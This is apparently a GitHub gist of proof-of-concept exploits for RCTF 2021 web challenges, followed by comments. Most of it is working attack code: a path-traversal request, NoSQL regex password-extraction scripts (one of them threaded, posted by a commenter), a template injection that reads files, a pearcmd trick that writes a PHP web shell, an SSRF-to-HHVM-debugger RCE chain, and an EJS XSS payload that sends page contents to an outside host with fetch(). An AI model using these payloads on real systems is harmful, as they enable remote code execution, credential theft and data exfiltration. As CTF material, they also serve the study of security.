Skip to content

Instantly share code, notes, and snippets.

@TheGrandPew

TheGrandPew/PoCs for RCTF.md

Last active September 14, 2021 04:51
Show Gist options
  • Save TheGrandPew/79f076a4f68fc00286d5d33540bb5aa8 to your computer and use it in GitHub Desktop.
Save TheGrandPew/79f076a4f68fc00286d5d33540bb5aa8 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
PoCs for RCTF.md

EASYPHP

GET /%2561dmin%3Flogin&data=..%252F..%252F..%252F..%252Fflag HTTP/1.1
Host: 124.71.132.232:60080
User-Agent: AG

CandySHOP

leak:

import requests
import urllib3
import string
import urllib.parse
urllib3.disable_warnings()

username="rabbit"
password=""
u="http://123.60.21.23:23333/user/login"

while True:
    print("REPEAT")
    for c in 'abcdef0123456789':
            payload='username=rabbit&password[$regex]=^%s' % ((password + c))
            r = requests.post(u, data=payload,headers={"Content-Type": "application/x-www-form-urlencoded"})
            print("LOOP")
            if 'You Bad Bad' in r.text:
                print("Found one more char : %s" % (password+c))
                password += c
                break

Template Injection:

address=a"+x=`${process.mainModule.require('fs').readFileSync('/flag.txt')}`+g="b

Verysafe

Write php shell to tmp:

GET /../usr/local/lib/php/pearcmd.php?f=pearcmd&+-s+-c+/tmp/pewpewpewshell.php+-d+preferred_mirror="<?system($_GET[1]);?>" HTTP/1.1
Host: host
Content-Length: 0

HIPHOP

Use vs code debug port to get rce then a hhvm 0day

import requests
import urllib.parse
import base64

code = b"""<?hh
<<__EntryPoint>>
function main(): void {
  <cmd whitelist bypass that i censored :( >
}"""
code = base64.b64encode(code).decode()

packet = '{"command":"attach","arguments":{"name":"HHVM: Attach to Server","type":"hhvm","request":"attach","host":"localhost","port":8999,"remoteSiteRoot":"/tmp/censored","localWorkspaceRoot":"/tmp/censored2","__configurationTarget":5,"__sessionId":"9a121298-30b3-4be1-86ab-30fa15b036b6","sandboxUser":"user"},"type":"request","seq":2}\x00'
packet += '{"command":"setExceptionBreakpoints","arguments":{"filters":[]},"type":"request","seq":3}\x00'
packet += '{"command":"configurationDone","type":"request","seq":4}\x00'
packet += '{"command":"threads","type":"request","seq":5}\x00'
packet += '{"command":"evaluate","arguments":{"expression":"file_put_contents(\\"/var/www/html/sandbox/77b6f664807ad8e5dc17aeecdf8823af/pewoutput.php\\",base64_decode(\\"findme\\"))","context":"repl"},"type":"request","seq":6}\x00'.replace('findme',code)

packet = urllib.parse.quote_plus(urllib.parse.quote_plus(packet))


r = requests.get("http://124.71.132.232:58080/?url=gopher://localhost:8999/_"+packet)
r = requests.get("http://124.71.132.232:58080/sandbox/77b6f664807ad8e5dc17aeecdf8823af/pewoutput.php")
print(r.text)

XSS IT

EJS ODAY RIGHT HERE

http://host:3333/?asoul={"jiaran":"A","xiangwan":"x","beila":"A","jiale":"x","nailin":"A","__append":"A","filename":"
function rethrow(){fetch(`http://sitetosenddatto.com/?${btoa(document.documentElement.innerHTML)}`)}//"}
@krnbhargav
Copy link

donot mind sir,i have problem in candyshop,but
image
i am not getting any result.
can you please illustrate why's that not working and
please tell me how you make this payload of SSTI

@krnbhargav
Copy link

krnbhargav commented Sep 13, 2021
edited
Loading

Candy Shop
Can also use this to exfilterate rabbit password,(for very fast retrieval, use atleast 20 threads).
./exploit.py <THREADS>

#!/usr/bin/env python3
from requests import post
import string
from concurrent.futures import ThreadPoolExecutor,as_completed
from sys import argv
THREADS = 5
host = "http://123.60.21.23:23333/"
url = host+"user/login"
passw = ""
allowed_char = "abcdef0123456789"

def brute(x:str)->str:
  global passw
  try:
    r = post(url,data={"username":"rabbit","password[$regex]":"^"+x})
    if r.status_code == 200:
      if "You Bad Bad &gt;_&lt;" in r.text:
        passw = x
        print(passw)
        return "find"
      elif(len(passw) == 64):
        return "stop"
      else:
        return "false"
  except Exception as e:
    print(e)
def main():
  global passw,THREADS
  print(f"THREADS : {THREADS}")
  jobs = []
  loop = True
  while loop:
    try:
      with ThreadPoolExecutor(max_workers=THREADS) as p:
        jobs=[p.submit(brute,passw+x) for x in allowed_char]
        for job in as_completed(jobs):
          if job.result() == "find":
            break
          elif job.result() == "stop":
            loop = False
            break
    except KeyboardInterrupt:
      break
if __name__ == "__main__":
  if(len(argv[:1]) == 1):
    THREADS=int(argv[1])
  main()

@TheGrandPew
Copy link
Author

donot mind sir,i have problem in candyshop,but
image
i am not getting any result.
can you please illustrate why's that not working and
please tell me how you make this payload of SSTI

The template payload I wrote of memory, maybe the flag is not in /flag.txt. Maybe try to use child_process to get a shell.

@krnbhargav
Copy link

donot mind sir,i have problem in candyshop,but
image
i am not getting any result.
can you please illustrate why's that not working and
please tell me how you make this payload of SSTI

The template payload I wrote of memory, maybe the flag is not in /flag.txt. Maybe try to use child_process to get a shell.

ok i will try.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment